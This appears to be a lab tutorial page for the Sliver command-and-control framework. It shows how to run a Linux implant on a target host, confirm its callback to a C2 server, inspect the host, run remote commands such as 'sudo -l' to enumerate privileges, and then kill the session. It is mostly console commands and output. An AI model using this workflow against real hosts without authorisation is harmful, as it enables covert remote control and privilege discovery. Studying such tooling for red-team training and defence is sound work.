Skip to main content

Run a Linux Session

Deploy the Linux session implant to the target host, and run it:

./linsession

Once the implant has been executed, go back to the Sliver Client and run the sessions command to see if the implant has communicated back to the server:

[*] Session 847eb6a2 linsession - 192.168.0.133:47834 (kali-nucbox5) - linux/amd64 - Sun, 06 Oct 2024 11:38:59 EDT

sliver > sessions

 ID         Transport   Remote Address        Hostname       Username   Operating System   Health
========== =========== ===================== ============== ========== ================== =========
 847eb6a2   http(s)     192.168.0.133:47834   kali-nucbox5   root       linux/amd64        [ALIVE]

sliver >

We can now see that the implant was executed, communicated back to the Sliver Server, and it is "ALIVE". Next, run the use <ID> command to start interacting with the target host.

sliver > use 847eb6a2

[*] Active session linsession (847eb6a2-4bbe-4295-91d5-6aa5a4df8256)

sliver (linsession) >

Once you run the use command, you will notice that the Sliver command prompt will change with the name of the session included in it.

Running the ps command:

sliver (linsession) > ps

 Pid     Ppid    Owner              Arch     Executable
======= ======= ================== ======== =====================================================================
 1       0       root               x86_64   /sbin/init
 2       0       root                        kthreadd
 3       2       root                        pool_workqueue_release

To get information about the implant run the info command.

sliver (linsession) > info

        Session ID: 847eb6a2-4bbe-4295-91d5-6aa5a4df8256
              Name: linsession
          Hostname: kali-nucbox5
              UUID: 010987dd-f33d-4be8-b236-fb83f884c62e
          Username: root
               UID: 0
               GID: 0
               PID: 28472
                OS: linux
           Version: Linux kali-nucbox5 6.10.12-amd64
            Locale: en-US
              Arch: amd64
         Active C2: https://192.168.0.120
    Remote Address: 192.168.0.133:47834
         Proxy URL:
Reconnect Interval: 1m0s
     First Contact: Sun Oct  6 11:38:59 EDT 2024 (1m53s ago)
      Last Checkin: Sun Oct  6 11:40:49 EDT 2024 (3s ago)

sliver (linsession) >

To run commands on the target host that aren’t supported by Sliver, you can use the execute command to run it. Here is the help page for execute:

sliver (linsession) > help execute

Execute a program on the remote system

Usage:
======
  execute [flags] command [arguments...]

Args:
=====
  command    string         command to execute
  arguments  string list    arguments to the command

Flags:
======
  -h, --help                    display help
  -S, --ignore-stderr           don't print STDERR output
  -X, --loot                    save output as loot
  -n, --name          string    name to assign loot (optional)
  -o, --output                  capture command output
  -P, --ppid          uint      parent process id (optional, Windows only) (default: 0)
  -s, --save                    save output to a file
  -E, --stderr        string    remote path to redirect STDERR to
  -O, --stdout        string    remote path to redirect STDOUT to
  -t, --timeout       int       command timeout in seconds (default: 60)
  -T, --token                   execute command with current token (windows only)

sliver (linsession) >

Example:

sliver (linsession) > execute -o sudo -l

[*] Output:
Matching Defaults entries for steve on kali-nucbox5:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

Runas and Command-specific defaults for steve:
    Defaults!/usr/lib/*/libexec/kf5/kdesu_stub !use_pty

User steve may run the following commands on kali-nucbox5:
    (ALL : ALL) ALL
    (ALL : ALL) NOPASSWD: ALL

sliver (linsession) >

To close the session, simply issue the close command:

sliver (linsession) > close

[!] Lost session 38b90e6c linuxsession - 192.168.0.133:51310 (kali-nucbox5) - linux/amd64 - Thu, 03 Oct 2024 16:52:53 EDT

Once your use of the implant is finished, you can kill the process on the target host, or you can just kill the session in Sliver. Keep in mind that the executable will still be on the target host.

sliver (linsession) > sessions

 ID         Transport   Remote Address        Hostname       Username   Operating System   Health
========== =========== ===================== ============== ========== ================== =========
 847eb6a2   http(s)     192.168.0.133:47834   kali-nucbox5   root       linux/amd64        [ALIVE]

sliver (linsession) > sessions -k 847eb6a2

[!] Lost session 847eb6a2 linsession - 192.168.0.133:47834 (kali-nucbox5) - linux/amd64 - Sun, 06 Oct 2024 11:44:18 EDT


sliver > sessions

[*] No sessions 🙁

sliver >